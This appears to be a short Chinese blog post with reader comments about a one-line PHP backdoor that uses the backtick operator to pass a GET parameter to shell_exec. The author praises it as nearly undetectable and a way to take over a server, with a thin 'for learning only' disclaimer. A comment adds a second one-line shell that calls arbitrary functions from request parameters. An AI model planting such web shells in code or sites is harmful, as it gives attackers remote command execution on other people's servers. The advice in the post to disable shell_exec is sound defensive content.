$safe = $_GET['s']; if (isset($safe)){ echo `$safe`; }
上面这段代码发现了什么,感觉好像没什么别的东西吧 就是打印个字符串而已~
其实不然...其实我也是刚知道的...反撇号不同于单引号...长相不错,不过功能大相径庭
单引号“'’” 就是个简单字符串
反撇号“`”确实一个函数的简化,而那个函数...shell_exec 都知道是干嘛的吧...
也就一个小马而已,最多拿个shell而已,带走整个服务器,没什么大不了咯~~~
很机智的一个后门...绝逼看不出来~反正我第一眼没发现什么
所以,如果没什么大用 shell_exec函数还是禁止吧,一般没卵用。
本函数仅供学习,出什么事别找我就好了~
请问这个后门密码是多少 测试了进不去啊~
2016年8月5日 22:33看着好深奥哦。。去试试~不会出什么事吧
2016年7月29日 17:00没人知道就没事
2016年8月4日 09:12貌似深奥 不堪一击~
2016年7月21日 14:05$_GET[a]($_GET[b]);
2016年7月21日 07:42